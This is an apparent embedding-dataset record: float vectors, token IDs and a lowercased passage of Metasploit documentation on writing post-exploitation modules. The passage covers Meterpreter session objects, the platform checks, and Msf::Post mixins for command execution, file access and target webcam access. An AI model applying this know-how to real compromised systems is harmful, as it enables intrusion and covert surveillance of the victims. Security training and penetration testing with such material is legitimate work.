[ 0.37141838669776917, -0.5797892808914185, -0.2705737352371216, 0.16301408410072327, -0.5999963283538818, -0.31844061613082886, -0.06261314451694489, 0.3486911356449127, 0.31223365664482117, 1.0209481716156006, 0.3103146255016327, 0.5396184325218201, 0.1295504868030548, -0.8539366722106934, -0.34779301285743713, -0.24602247774600983, -0.24370718002319336, -0.19191844761371613, -1.035494327545166, -0.2891658544540405, 0.4321382939815521, -0.32707616686820984, -0.5382246971130371, -0.8302438259124756, -0.644832193851471, -0.025535956025123596, 0.9794265031814575, 0.2682247757911682, 0.2250787317752838, 0.845231294631958, 0.26461261510849, 0.25951114296913147, -0.20054808259010315, -0.4931584596633911, 0.013700515031814575, -0.45493707060813904, 1.0500439405441284, -0.8125840425491333, -0.016909034922719002, -0.44405508041381836, 0.449788361787796, -0.05662218853831291, 0.174144446849823, -0.30536240339279175, -0.5355672240257263, -0.31305599212646484, -0.21126216650009155, -0.303928941488266, 0.9246504306793213, -0.5361174941062927, 0.8826982378959656, 0.05003618821501732, 0.1824791133403778, 0.5158545970916748, 0.6190884709358215, -0.002191471867263317, 0.15630418062210083, 0.36468949913978577, -0.009977692738175392, 0.263928085565567, -0.41818946599960327, -0.05286526307463646, 0.2432217001914978, -1.1018847227096558, -0.21042528748512268, 0.40450432896614075, 0.22238731384277344, -0.5483851432800293, -0.014977329410612583, -0.8666390776634216, -0.2516922950744629, 0.33865436911582947, -0.9985465407371521, 0.23144656419754028, -0.7315742373466492, 0.28948158025741577, 0.48307907581329346, -0.20741723477840424, -0.3072741627693176, 0.5476605296134949, 0.018839027732610703, 0.8783479332923889, 0.6187983155250549, 0.5796831846237183, 0.26143187284469604, -0.5257238745689392, 0.7029293179512024, 0.3231703042984009, -0.4564894437789917, 0.09562733769416809, 0.7092557549476624, 0.5319735407829285, -0.49715980887413025, -0.15173302590847015, 0.7073305249214172, 0.2657249867916107, -0.6249310970306396, 0.17990410327911377, 0.6162819862365723, -0.009436411783099174, 0.736214816570282, 0.584112286567688, 0.04811354726552963, 0.1648455411195755, 0.034143880009651184, 0.775886595249176, 0.4383651912212372, -0.0586852952837944, -0.028293438255786896, -0.3375900089740753, 0.36812523007392883, 0.18997244536876678, -0.3281119763851166, -0.7799991965293884, -0.424917072057724, 0.47508421540260315, 0.11949141323566437, -0.06407897174358368, -0.7061063051223755, 0.6513945460319519, 0.16625139117240906, -0.5889372825622559, 0.6474338173866272, 0.006914784666150808, 0.16392579674720764, -0.017659509554505348, -0.07776276767253876, 0.4969478249549866, -0.9120625853538513, -0.4137873947620392, -0.41284093260765076, 0.016032855957746506, 0.02286616712808609, 0.5549459457397461, -0.031925469636917114, -0.39823514223098755, 0.1546834409236908, 0.2544444501399994, 0.8408317565917969, -0.8317129015922546, -0.340067058801651, 0.3344677686691284, 0.39112406969070435, 1.370632529258728, -0.13529083132743835, 0.17962481081485748, -0.17175079882144928, 0.12801311910152435, -0.18930453062057495, 0.3001551330089569, -0.1474926471710205, 0.00966157391667366, 0.5353056788444519, -0.25125718116760254, -0.17092902958393097, 0.05206197500228882, -0.26899847388267517, 0.5496840476989746, -1.0514864921569824, 0.02577509544789791, -0.7935413122177124, 1.1628592014312744, 0.14800147712230682, 0.502128005027771, -0.20447468757629395, 0.49473124742507935, -0.5355491042137146, -0.6577379703521729, -0.4350726902484894, 0.21026411652565002, 0.00920463353395462, -0.2572574317455292, 0.04397154971957207, 0.17307034134864807, 1.5666898488998413, 0.7104508876800537, -0.738164484500885, 0.22502124309539795, -0.18404485285282135, 0.8479323387145996, -0.7926543951034546, -0.12418220192193985, 0.20373810827732086, 0.7472074031829834, -0.2746983468532562, 0.538939356803894, -0.21573860943317413, -0.6644164323806763, -0.4123421311378479, -0.4361242949962616, -0.23193895816802979, 0.38281553983688354, -0.37722691893577576, 0.46836182475090027, 0.6523059606552124, 0.06701192259788513, -1.2382527589797974, 0.03387797996401787, -0.2392576038837433, -1.0589869022369385, -0.23814991116523743, 0.49213287234306335, -0.17746272683143616, 0.38430100679397583, -0.4279709756374359, -0.3807477653026581, 0.6027644872665405, 0.6329489946365356, -0.2969743609428406, 0.37768974900245667, 1.150172472000122, 0.06141006946563721, -0.6647571325302124, -0.4574819505214691, -0.1817648559808731, -0.242447629570961, -0.37614867091178894, 0.6076247096061707, -0.47842252254486084, -0.1095634177327156, -0.4066547453403473, 0.49905019998550415, 0.3174283504486084, 0.15557777881622314, -0.46630966663360596, -0.889737069606781, -0.4278814494609833, 0.33868488669395447, -0.2712697982788086, 0.38655075430870056, 0.06159377470612526, 0.7648314237594604, -0.10323507338762283, 1.190697193145752, 0.3508346378803253, -0.47081679105758667, 0.6723695993423462, 0.19957277178764343, 0.6290725469589233, -0.09590976685285568, -0.12697088718414307, 0.6866838932037354, 0.26806873083114624, 0.5079002976417542, 1.1740843057632446, 0.5667356252670288, -0.17204442620277405, -0.5463955402374268, 0.22672918438911438, 1.045431137084961, -0.44746696949005127, 1.398713231086731, 0.543904185295105, 0.16373209655284882, -0.9377827644348145, -1.2213423252105713, 0.6080963015556335, 0.8146284818649292, -0.7900700569152832, -1.2402355670928955, -0.4467897415161133, -0.6031453013420105, -0.8035027980804443, -0.04653095081448555, 0.5252635478973389, 0.5219682455062866, 0.23121561110019684, 0.17462119460105896, -0.39735618233680725, -1.130939245223999, -0.5638263821601868, -0.3367959260940552, -0.9948232173919678, -0.41737011075019836, -0.7063471078872681, 0.11073539406061172, -0.427080899477005, -0.13895684480667114, 0.4930707514286041, -0.2674451172351837, -0.5976667404174805, 0.3132738471031189, -0.010901161469519138, 0.7014833688735962, -0.6675503253936768, -0.4774875044822693, -0.7359418869018555, 0.4886709749698639, 0.16567231714725494, 0.7693821787834167, -0.575745701789856, -0.3558286428451538, -0.20397964119911194, -0.35548603534698486, -0.08174754679203033, 0.18140250444412231, 1.0397729873657227, -0.051790669560432434, -0.24705392122268677, -0.23492680490016937, -0.4123274087905884, -0.14894399046897888, 0.07608306407928467, -0.11390149593353271, -0.3465278446674347, 0.569507896900177, -0.13713274896144867, 0.17305509746074677, 0.8351816534996033, 0.681416392326355, -0.8285179734230042, 0.5916312336921692, -0.2577580213546753, 0.9606090188026428, -0.8895291090011597, 0.4817882776260376, 0.3314831852912903, 0.0847332626581192, 0.21228815615177155, -0.40168264508247375, -0.37128353118896484, -0.22541552782058716, -0.19381441175937653, -0.4339134693145752, -0.05172634869813919, 0.6500425934791565, 0.14572924375534058, -0.7809599041938782, 0.8130739331245422, -0.5809023976325989, -0.33176782727241516, -0.06861405074596405, -0.06734577566385269, 0.6181267499923706, 0.28295353055000305, 0.6671854853630066, -0.608405351638794, -0.35073694586753845, 0.01661795563995838, 0.09752251207828522, 0.21104563772678375, -0.6750475764274597, 0.648118793964386, -0.09495218843221664, -0.41902226209640503, 0.6403326392173767, 0.45891422033309937, -0.6794971823692322, -0.7602044939994812, -0.07368215173482895, -0.2684473991394043, 0.028556160628795624, 0.2717881500720978, 0.21709759533405304, -0.07778997719287872, 0.8033590316772461, -0.4771983325481415, -0.09966620057821274, 0.3130725622177124, -0.20759868621826172, 0.25650346279144287, 0.3426392674446106, -0.23099994659423828, 0.02235872484743595, -0.5619946122169495, -0.7729228734970093, 0.25745201110839844, 0.17053455114364624, 0.5524501800537109, -0.16227102279663086, 0.9829833507537842, -0.2613113820552826, -0.0437026210129261, 0.14062149822711945, -0.6920368671417236, -0.5708908438682556, 0.1649426519870758, -0.4211743175983429, 0.29092201590538025, -0.08592644333839417, 1.0649819374084473, -0.050939224660396576, -0.1304154098033905, 0.06007184088230133, 0.15396858751773834, 0.24162012338638306, -0.7132255434989929, -0.6164117455482483, 0.08461073786020279, -0.09369191527366638, -0.11362779140472412, -0.3896968960762024, 0.507560133934021, -0.3655764162540436, -0.9274751543998718, -0.6542457342147827, 1.1100740432739258, 0.4570966064929962, 0.9190964698791504, 0.47438594698905945, 0.5017547011375427, -0.16470856964588165, -0.3081437051296234, 0.6229104995727539, -0.3767096996307373, 0.270426869392395, 0.051595646888017654, 0.8565251231193542, -0.36597591638565063, -0.01379661075770855, -0.6684854030609131, 0.25505611300468445, 0.010188865475356579, 0.216876819729805, 0.049637578427791595, 0.30477574467658997, -0.4277040362358093, 0.11802166700363159, 0.14770929515361786, 0.2340722233057022, -0.5557783842086792, -0.4504547715187073, -0.25442570447921753, 0.5984652638435364, 0.5751571655273438, -0.5258265733718872, -0.2569655478000641, -0.6629089117050171, 0.47406286001205444, 0.21514171361923218, -0.07106350362300873, -0.9172583818435669, -0.4469296932220459, -0.4318713843822479, -0.4165988266468048, -0.11767907440662384, 0.47135889530181885, 0.05486488714814186, 0.1020859032869339, -0.41749659180641174, 0.11151212453842163, -0.2074386477470398, -0.3810949921607971, -0.2872292101383209, 0.020374055951833725, 0.651755690574646, 0.027821004390716553, 0.4071556329727173, -0.10964895784854889, -0.7146989107131958, -0.09571153670549393, -0.8193379640579224, 0.8908802270889282, -0.43554210662841797, 0.19447752833366394, 0.9104658961296082, 0.5293248891830444, 0.2870142161846161, 0.2605517506599426, -0.7127344012260437, 0.26621782779693604, -0.45711982250213623, 0.5136674642562866, -0.27391517162323, -0.061689283698797226, 1.0381827354431152, 0.1334916651248932, -0.2672876715660095, 0.6177722215652466, 0.2945813834667206, -0.25679078698158264, -0.16397348046302795, -0.46616971492767334, -0.7566452026367188, 0.8536065220832825, -0.42205092310905457, 0.33456116914749146, 0.2199924886226654, 0.20552882552146912, -0.005772435571998358, -0.8947432637214661, 1.0116831064224243, 0.07280641049146652, 0.11552312970161438, -0.7072707414627075, -0.5843371748924255, 0.18613159656524658, -0.06313769519329071, 0.21823246777057648, 0.6202772259712219, -0.2874634861946106, -0.18777936697006226, 0.5965132117271423, 0.17010261118412018, -0.7674431204795837, -0.025896556675434113, 0.004743864759802818, 0.18284718692302704, -0.5027751326560974, -0.23148149251937866, 0.5139651894569397, -0.06639634817838669, -0.21568554639816284, 0.24142388999462128, 0.26721882820129395, -0.0025386682245880365, -1.035656452178955, 0.1510068029165268, -0.6524057388305664, 0.1313765048980713, -0.7530416250228882, 0.1901080161333084, -0.015876617282629013, 0.27136752009391785, -0.21673856675624847, 0.12325733155012131, 1.0798143148422241, -0.6675292253494263, 0.3145937919616699, 0.5056087374687195, 0.3815278112888336, -0.7082007527351379, 0.034335386008024216, 0.5849771499633789, 0.00959326047450304, -0.05108793452382088, 0.23881705105304718, -0.5358687043190002, -0.535484254360199, -0.7685854434967041, 0.19579492509365082, -0.5360478162765503, 0.15145236253738403, -0.5979815721511841, -0.4619933068752289, -0.41049760580062866, 0.536277174949646, 0.22192178666591644, -1.0607315301895142, 0.29187002778053284, -0.11695278435945511, 0.5387791395187378, -0.32061120867729187, 0.1033620834350586, -0.3124132454395294, -0.7365342378616333, -0.5335381031036377, 0.8317100405693054, -0.14835502207279205, 0.0915786623954773, -0.019247710704803467, -0.46225816011428833, 0.27912816405296326, -0.024197574704885483, -0.6268073320388794, -0.3388066589832306, 0.31141674518585205, -0.16029584407806396, -0.25190269947052, 0.5590497851371765, -0.10566934198141098, 0.5895483493804932, 0.2797833979129791, 0.021862229332327843, -0.12134528160095215, 0.2643204629421234, -0.7322506904602051, 0.42601558566093445, 0.7278351187705994, -0.6985602974891663, -0.05377800390124321, -0.06685466319322586, 0.4215583801269531, 0.7561760544776917, -0.3702118694782257, -0.6328340768814087, 0.010660460218787193, -0.7524319291114807, -1.094608187675476, 0.522793710231781, -0.26499176025390625, -0.0314326249063015, 0.011592241004109383, -0.004027236253023148, 0.28825077414512634, -0.35133975744247437, 0.19254529476165771, 0.7460185289382935, 0.18632706999778748, 0.23616325855255127, -0.8960248827934265, 0.5573949217796326, 0.43972551822662354, -0.11879409104585648, 0.4978363811969757, -0.3117513656616211, 0.025302013382315636, -0.24185848236083984, -0.10804067552089691, -0.46326521039009094, -0.8204745650291443, -0.08373142033815384, 0.4232470393180847, 0.022364076226949692, 0.8766920566558838, -0.2872515022754669, -0.2566283345222473, -0.036689650267362595, -0.07716147601604462, -0.18904052674770355, 0.4572586119174957, 0.8956568837165833, 0.5865083932876587, 0.14832156896591187, -0.14851628243923187, 0.522514820098877, -0.46084192395210266, -0.3318612277507782, 0.6269279718399048, 0.5239202976226807, -0.10821613669395447, 0.4985351860523224, 0.383933961391449, -0.5961731672286987, -0.4853997528553009, -1.299157977104187, -0.3234316408634186, 0.12347909063100815, -0.6169165968894958, -0.8531732559204102, -0.10953580588102341, 0.11023179441690445, -0.19201119244098663, 0.6668084263801575, -0.16063310205936432, 0.02469327114522457, -0.9301876425743103, 0.2765580713748932, 0.033728230744600296, 0.29278069734573364, 0.9476920962333679, -0.6558083295822144, -0.47019174695014954, -0.8639090061187744, -0.3776454031467438, 0.1765136420726776, 0.38675200939178467, 0.8974290490150452, -0.2885797619819641, 0.1139996349811554, -0.021259043365716934, -0.11189728230237961, 0.4271375834941864, -0.10041944682598114, 0.42293837666511536, 0.8224582076072693, -0.05151259899139404, -0.6836942434310913, -0.5283869504928589, 0.11268512159585953, 0.12270897626876831, 0.6742424964904785, -0.4839530885219574, -0.1604596972465515, -0.053412433713674545, 0.3478451073169708, 0.023283563554286957, -1.0395666360855103, -0.9044612050056458, -1.0024131536483765, -0.1396147608757019, 0.059455741196870804, 0.2996300756931305, -0.10743694752454758, -0.021589847281575203, -0.7040432691574097, -0.04922163113951683, -0.5811834931373596, 0.1958339661359787, -0.3284573256969452, -0.026527300477027893, -0.7332326173782349, 0.4910275340080261, -0.47339072823524475, -0.654747724533081, -0.699138343334198, 0.08227922767400742, -0.30218827724456787, -0.21794719994068146, 0.014402005821466446, 0.0817134827375412, -0.7547371983528137, 0.04968152940273285, -0.5490544438362122, -0.3180404603481293, 0.2165418118238449, -0.418652206659317, 0.1950729787349701, 0.6967892050743103, -0.5999200940132141, -0.02871047332882881, 0.16817764937877655, -0.23635491728782654, 0.3951056897640228, -0.32338082790374756, 0.1217583492398262, 0.07321366667747498, -0.5017801523208618, -0.07608489692211151, -0.11816190183162689, -0.4089632034301758, 0.07658752799034119, -0.40171849727630615, -1.060400128364563, -0.581601619720459, -0.2602598965167999, -0.23329482972621918, 0.5342236757278442, -0.5561567544937134, 0.41201046109199524, 0.5113738775253296, 0.6810763478279114, 0.8222216367721558, -0.6933103799819946, 0.7739174365997314, 0.39589357376098633, 0.1524900197982788, -0.06157628446817398, 0.7268430590629578, -0.1609860509634018, -0.09217806905508041, 0.07251252233982086, 0.3372635841369629, -0.511372983455658, 0.2762400507926941, -0.5176607370376587, -0.21299047768115997, -0.9120194911956787, -0.33918997645378113, -0.32900598645210266, 0.32674145698547363, 0.5442234873771667, 0.02400778979063034, 0.27868252992630005, 0.17903582751750946, -0.48786553740501404, 0.11887527257204056, -0.7143287658691406, 0.4140900671482086, 0.23384864628314972, 0.27108800411224365, -0.0577554777264595, -0.5457990169525146, -0.10273770987987518, -0.11737068742513657, 0.18171122670173645, 0.26358145475387573, 0.15136629343032837, 0.08067317306995392, 0.14870519936084747, 1.1699333190917969, -0.30245962738990784, -0.5349040031433105, -0.3446270525455475, 0.31011855602264404, -0.12210837006568909, -1.1518661975860596, 0.2648501396179199, 0.5520246028900146, 0.06908323615789413, -0.3506830930709839, -0.40305569767951965, 0.2920713722705841, 0.26767513155937195, 0.12481587380170822, 0.2804008424282074, -0.0870094746351242, -0.45286083221435547, 0.7415001392364502, -0.44794726371765137, 0.2274150550365448, -0.29194027185440063, -0.11375147849321365, 0.2688831388950348, -0.14068982005119324, -0.6163997054100037, 0.22512681782245636, 0.026139643043279648, -0.6902481913566589, 0.8060572743415833, 0.6105172038078308, 0.44735997915267944, -0.71879643201828, 0.19858156144618988, -0.4123848080635071, 0.21041478216648102, 0.34126725792884827, 0.40684667229652405, 0.11935404688119888, 0.1604800969362259, 0.8845312595367432, -0.3197133243083954, -0.15020553767681122, 0.5209105610847473, 0.28559184074401855, -0.41379255056381226, 0.2476663440465927, -0.11259780824184418, -0.08100870996713638, 0.07539219409227371, -0.23398053646087646, 0.08086764067411423, 0.18345817923545837, 0.0871734544634819, 0.20779675245285034, -0.38679635524749756, 1.0196549892425537, -0.044923923909664154, 0.42864087224006653, -0.2566617429256439, 0.4056493937969208, 0.29200267791748047, 0.05691813305020332, -0.8076151013374329, 0.7897801399230957, 0.9989118576049805, 0.450174480676651, -0.4400674104690552, 0.14889994263648987, 0.08888331055641174, 0.12958867847919464, -0.11082293093204498, -0.23635683953762054, -0.6097446084022522, 0.4270556569099426, -0.060603026300668716, -0.7084084749221802, -1.0457192659378052, 0.06854305416345596, 0.3502165675163269, 0.2381444275379181, 0.33556634187698364, -0.6388717889785767, 0.700100839138031, -0.6075266599655151, 0.38196805119514465, -0.34398674964904785, 0.11885931342840195, 0.2801267206668854, 0.009883791208267212, -0.1812463402748108, 0.8300186395645142, -0.22670066356658936, 0.7209726572036743, 0.3029564619064331, 1.126131296157837, 0.23036076128482819, 0.7009807825088501, 0.11923063546419144, -0.5809779763221741, -0.7207475900650024, -0.10581719130277634, -0.3621906042098999, -0.393841415643692, 0.05323407053947449, -0.3741752505302429, 0.5946109890937805, -0.05604632571339607, -0.31880325078964233, -0.2624415159225464, 0.4103103578090668, -0.5281205177307129, -0.15179331600666046, 0.6443799734115601, 0.063954658806324, -0.62249356508255, -0.31034213304519653, 0.07341252267360687, 0.31705957651138306, 0.6789603233337402, 0.06083891913294792, -0.5669562816619873, -0.6486128568649292, -0.07176244258880615, -0.7006070613861084, 0.6298923492431641, -0.021643921732902527, -0.7136361002922058, -0.44537118077278137, -0.9488544464111328, -0.46275535225868225, -0.4391654431819916, -0.018196452409029007, -0.23710039258003235, 0.7135886549949646, 0.5936855673789978, 0.5587537884712219, 0.1705714911222458, -0.4212796688079834, -0.44652247428894043, 0.16427655518054962, 0.6661908030509949, 0.039522551000118256, 0.4892368018627167, 0.49790599942207336, 0.0002511773491278291, 0.026800155639648438, -0.39997270703315735, 0.08977771550416946, 0.45697683095932007, -0.09382592141628265, -0.020110920071601868, -0.21376623213291168, -0.584531843662262, -0.6402779817581177, 0.17767931520938873, 0.11154122650623322, 0.5270567536354065, 0.09887909889221191, -1.0353071689605713, -0.41817477345466614, -0.7249396443367004, 0.495319664478302, 0.056418221443891525, 0.8863659501075745, -0.33300793170928955, -0.05308421701192856, 0.38770559430122375, -1.0092086791992188, 4.358434677124023, 0.5179210305213928, 0.16740137338638306, -0.10223478823900223, 0.4268198311328888, 1.224626064300537, 0.6914128661155701, -0.4390697181224823, 0.8620995283126831, -0.15739034116268158, 0.8272606134414673, -0.03202236816287041, -0.06974492222070694, 0.5539036393165588, 0.4762457311153412, 0.5955415964126587, -0.31348636746406555, 0.5725482106208801, -0.008188038133084774, -0.7385149598121643, -0.7473773956298828, -0.25879546999931335, -0.5674852728843689, 1.287387490272522, -0.0947294533252716, 0.3953934609889984, 0.2904888987541199, -0.705805242061615, 0.14937707781791687, -0.4048119783401489, -0.15082937479019165, -0.4370226562023163, -0.2427455484867096, -0.053688228130340576, -0.2708107531070709, 0.0009196133469231427, 0.05535633862018585, -0.7675292491912842, -0.6572815179824829, -0.1261276751756668, 0.2511868476867676, -0.08549395203590393, -0.03786094859242439, -0.6708767414093018, 0.30464133620262146, 0.6982344388961792, -0.6033281683921814, 0.2901753783226013, 0.9380626082420349, -0.6103610992431641, 0.6432130932807922, -0.2560165822505951, 0.5584014058113098, 0.6206867694854736, -0.8339510560035706, 0.05837036669254303, 0.03229285031557083, -0.15804381668567657, 0.3122410178184509, -0.30084583163261414, 0.3326452076435089, -0.5240467190742493, -0.020435163751244545, -0.19222494959831238, -0.057670097798109055, 0.6935819983482361, -0.38735756278038025, 0.4661695063114166, -0.7763835787773132, 0.24797694385051727, 0.04425507411360741, -0.34410470724105835, -0.6820855140686035, -0.27108365297317505, 0.8621953725814819, 0.211154043674469, -0.670036792755127, 0.21505896747112274, 0.17775468528270721, -0.5217217803001404, -0.3857790529727936, -0.6345286965370178, -1.1311390399932861, 0.3124365508556366, 0.6406297087669373, 0.594452440738678, 0.46512264013290405, -0.9868836998939514, 0.22023029625415802, 0.08328182250261307, 0.6473764777183533, -0.10595658421516418, -0.4216618239879608, 0.11471033841371536, 0.3495912551879883 ]
[ 2019, 4044, 8023, 1024, 1011, 1007, 2467, 2079, 2115, 19453, 1010, 1998, 5383, 2004, 2116, 16820, 2017, 2064, 2228, 1997, 1012, 1998, 2087, 14780, 1010, 2131, 2115, 1058, 5244, 1998, 3231, 999, 7236, 1997, 2695, 14184, 19894, 14184, 2024, 20427, 2241, 2006, 2037, 5248, 1012, 2005, 2742, 1010, 2065, 2009, 17427, 2951, 1010, 8100, 2009, 3632, 2000, 1996, 1523, 8587, 1524, 4696, 1012, 2065, 2009, 9909, 1013, 14409, 1013, 2030, 20362, 2019, 5310, 1010, 2009, 7460, 2000, 1523, 6133, 1524, 1012, 2182, 1521, 1055, 1037, 2862, 2004, 1037, 4431, 1024, 4696, 6155, 23235, 3258, 20697, 5886, 5302, 8566, 4244, 2008, 9125, 2951, 7215, 1013, 9334, 1013, 4372, 17897, 8156, 1012, 8587, 1013, 22496, 5302, 8566, 4244, 2008, 8954, 22496, 1012, 8587, 1013, 15359, 25855, 8566, 4244, 2008, 9125, 15359, 2015, 2951, 7215, 1012, 6133, 5302, 8566, 4244, 2008, 16913, 14144, 1013, 5748, 1013, 17708, 2015, 2242, 2006, 1996, 2291, 1012, 5219, 2968, 3141, 8518, 2107, 2004, 9230, 1010, 13341, 2036, 2175, 2182, 1012, 28667, 2239, 5302, 8566, 4244, 2008, 2097, 2393, 2017, 4553, 2062, 2055, 1996, 2291, 1999, 3408, 1997, 8967, 1010, 2021, 2025, 2055, 2951, 11065, 1012, 3305, 2023, 2003, 2025, 1996, 2168, 2004, 1523, 8587, 1524, 2828, 14184, 1012, 1059, 5802, 5302, 8566, 4244, 2008, 2024, 2005, 1059, 5802, 3141, 8518, 1012, 9686, 25015, 22513, 24158, 2003, 2139, 28139, 12921, 1010, 2021, 1996, 14184, 3961, 2045, 2349, 2000, 6217, 1012, 2023, 2109, 2000, 2022, 1996, 2173, 2005, 14293, 9686, 25015, 3508, 14184, 1012, 2035, 14293, 9686, 25015, 3508, 14184, 2024, 2053, 2936, 2641, 2004, 2695, 14184, 1010, 2027, 1521, 2128, 2085, 20397, 1012, 5425, 5302, 8566, 4244, 2008, 9125, 8822, 2242, 2005, 2951, 3074, 1012, 2005, 2742, 1024, 3145, 15899, 1012, 5219, 5200, 2080, 2017, 2113, 2129, 1999, 2935, 1997, 1996, 7635, 1010, 2111, 2024, 6135, 15896, 2007, 1996, 2028, 3614, 1029, 2092, 1010, 2008, 1521, 1055, 2129, 2009, 2003, 2007, 1996, 5219, 4874, 1012, 1996, 2028, 4874, 2017, 3685, 2444, 2302, 1010, 2009, 1521, 1055, 2115, 9062, 1012, 2035, 2695, 14184, 1998, 2060, 3141, 4666, 7076, 10468, 2024, 2328, 2006, 2327, 1997, 1996, 5219, 4874, 1010, 2138, 2009, 4282, 2673, 2055, 1996, 20419, 3677, 1010, 1998, 4473, 2017, 2000, 3094, 2009, 1012, 2017, 2064, 2224, 1996, 5219, 4118, 2000, 3229, 1996, 5219, 4874, 1010, 2030, 2049, 14593, 7396, 1012, 1996, 2190, 2126, 2000, 11835, 2007, 2028, 2003, 3081, 20868, 2497, 1010, 2182, 1521, 1055, 2019, 2742, 1997, 2129, 1024, 5796, 2546, 18077, 1006, 28213, 1007, 1028, 2448, 1031, 1008, 1033, 2318, 7901, 28213, 2006, 17613, 1012, 16923, 1012, 1015, 1012, 4185, 1024, 4008, 22932, 1031, 1008, 1033, 3225, 1996, 18093, 28213, 1012, 1012, 1012, 1031, 1008, 1033, 6016, 2754, 1006, 6146, 2683, 22275, 2575, 27507, 1007, 2000, 17613, 1012, 16923, 1012, 1015, 1012, 10114, 1031, 1008, 1033, 8316, 28139, 3334, 5219, 1015, 2441, 1006, 17613, 1012, 16923, 1012, 1015, 1012, 4185, 1024, 4008, 22932, 1011, 1028, 17613, 1012, 16923, 1012, 1015, 1012, 10114, 1024, 4583, 16068, 2581, 1007, 2012, 2297, 1011, 5718, 1011, 2861, 2459, 1024, 5354, 1024, 4029, 1011, 28714, 2692, 8316, 28139, 3334, 1028, 20868, 2497, 1031 ]
metasploit
111.txt
1
* ] starting irb shell [ * ] the'client'variable holds the meterpreter client > > session. class = > msf : : sessions : : meterpreter _ x86 _ win at this point you have the power to rule them all. but notice that the above example is a msf : : sessions : : meterpreter _ x86 _ win object. there are actually several more different ones : command _ shell. rb, meterpreter _ php. rb, meterpreter _ java. rb, meterpreter _ x86 _ linux. rb, etc. each behaves differently so it ’ s actually kind of difficult to explain them all, but they are defined in the lib / msf / base / sessions / directory so you can see how they work. or you can play with one since you ’ re already in the irb prompt. in ruby, there are two object methods that are handy for debugging purposes. the first is methods, which will list all the public and protected methods from that object : session. methods the other one is inspect, which returns a string of a human - readable representation of the object : session. inspect one commonly used method of the session object is the platform method. for example, if you ’ re writing a post module for a windows exploit, in the check method you ’ ll likely want to use session. platform to ensure the target session is affected : unless session. platform = ='windows'# non - windows systems are definitely not affected. return exploit : : checkcode : : safe end you can also look at other current post modules and see how they use their session object. the msf : : post mixinas we explained, most post module mixins are built on top of the session object, and there are many out there. however, there is a main one you obviously cannot live without : the msf : : post mixin. when you create a post module with this mixin, a lot of other mixins are also already included for all kinds of scenarios, to be more specific : msf / core / post / common - common methods post modules use, for example : cmd _ exec. msf / core / post _ mixin - keeps track of the session state. msf / core / post / file - file system related methods. msf / core / post / webrtc - uses webrtc to interact with the target machine ’ s webcam. msf / core
[ 0.3863670229911804, -0.4135841429233551, -0.09389625489711761, 0.10695186257362366, -0.5044516921043396, -0.5269260406494141, -0.0656544417142868, -0.04257849231362343, -0.24633781611919403, 0.6133447885513306, 0.4112032949924469, -0.16641630232334137, 0.2183244824409485, -0.4956376552581787, -0.2597244083881378, -0.07482396811246872, -0.6483799815177917, 0.11682579666376114, -1.1186928749084473, -0.23117850720882416, 0.3485471308231354, -0.12821735441684723, -0.2364998459815979, -0.9586064219474792, -0.7338632345199585, 0.6147665977478027, 0.5388156175613403, -0.15207402408123016, 0.6997792720794678, 0.41729626059532166, 0.5498953461647034, -0.30384886264801025, -0.005131502170115709, -0.15581725537776947, 0.13350120186805725, -0.4580981433391571, 0.8479225635528564, -1.1077288389205933, 0.6175649166107178, -0.3618394434452057, 0.669654130935669, -0.2576039135456085, -0.10190662741661072, -0.2168121337890625, -0.6994207501411438, -0.44542160630226135, 0.03607698529958725, -0.7557708024978638, 0.6836061477661133, -0.6451076865196228, 0.33268651366233826, -0.07547318190336227, 0.03194193169474602, 0.8016003370285034, 0.5440301299095154, -0.12954595685005188, -0.347816526889801, 0.3240925073623657, -0.4176323115825653, 0.08327866345643997, -0.24641185998916626, 0.7494099140167236, 0.22843438386917114, -0.6767522692680359, 0.11949265748262405, 0.47961896657943726, 0.0474531315267086, -0.7434404492378235, 0.12493418157100677, -0.708454966545105, 0.08704593777656555, 0.6611084342002869, -0.5761125087738037, 0.1538936197757721, -0.5702357292175293, 0.24329426884651184, 0.22065469622612, -0.5555576682090759, 0.18859772384166718, 0.6336643099784851, 0.08749198168516159, 0.6924265623092651, 0.16982366144657135, -0.09765852987766266, 0.013907012529671192, -0.12238053232431412, 0.5622307062149048, 0.641792893409729, 0.05305210500955582, 0.09708426147699356, 0.8444335460662842, 0.35810214281082153, -0.19606469571590424, -0.12594343721866608, 0.5429262518882751, 0.5618109107017517, -0.9027568101882935, -0.0012996556470170617, 0.2724231481552124, -0.1928260624408722, 0.90873783826828, 0.06394297629594803, 0.049555063247680664, -0.4495999217033386, 0.1661960780620575, 0.35861703753471375, -0.03751717880368233, -0.02514559216797352, -0.378560334444046, -0.23247544467449188, 0.15874013304710388, 0.05400673672556877, 0.20871824026107788, -0.5284903645515442, 0.03481471538543701, 0.5895598530769348, 0.5585183501243591, 0.38733235001564026, -0.8757805824279785, 0.5723994374275208, -0.005105509888380766, -0.44180357456207275, 0.1812928020954132, -0.47133928537368774, 0.29390183091163635, -0.5266754031181335, 0.36454740166664124, 0.5796322822570801, -0.8024728298187256, -0.8616418838500977, 0.20739832520484924, -0.10740435868501663, -0.07714083045721054, 0.28717920184135437, 0.32966068387031555, 0.5952006578445435, 0.15866971015930176, 0.5619485974311829, 0.5389502048492432, -1.1321872472763062, -0.02799888886511326, 0.4786093831062317, 0.1048131063580513, 0.8885277509689331, 0.2142908275127411, -0.08106578141450882, -0.41936194896698, 0.3344966471195221, -0.8772042393684387, 0.09485432505607605, 0.05504743009805679, -0.31142568588256836, 0.4334739148616791, -0.7562468647956848, -0.02090071700513363, -0.6466752886772156, -0.3429074287414551, 0.09071880578994751, -0.4401809573173523, 0.42363452911376953, -0.5097829103469849, 0.9687275886535645, -0.06837024539709091, 0.5780996680259705, -0.158070906996727, -0.062185876071453094, -0.5346920490264893, -0.8756693005561829, -0.4588642418384552, 0.15485742688179016, 0.23169651627540588, -0.04483381286263466, 0.5288950204849243, 0.7034727931022644, 1.26191246509552, 0.8295822143554688, -0.20782266557216644, 0.16237887740135193, 0.10925912857055664, 0.7966933250427246, -0.5853996872901917, 0.4992695152759552, 0.4811449348926544, 0.5106932520866394, -0.17236153781414032, 0.4485682249069214, 0.3749362528324127, -0.767816960811615, -0.5040688514709473, 0.10419093817472458, -0.11593720316886902, 0.3705117702484131, -0.667822003364563, 0.6515821814537048, 0.457782506942749, -0.16875429451465607, -0.6910407543182373, -0.23557913303375244, -0.24444659054279327, -0.9222555756568909, -0.9300906658172607, 0.6553246378898621, -0.37137600779533386, 0.8310049176216125, -0.16918285191059113, -0.43614569306373596, 1.0860453844070435, 0.5217379927635193, -0.06719546020030975, 0.5948020815849304, 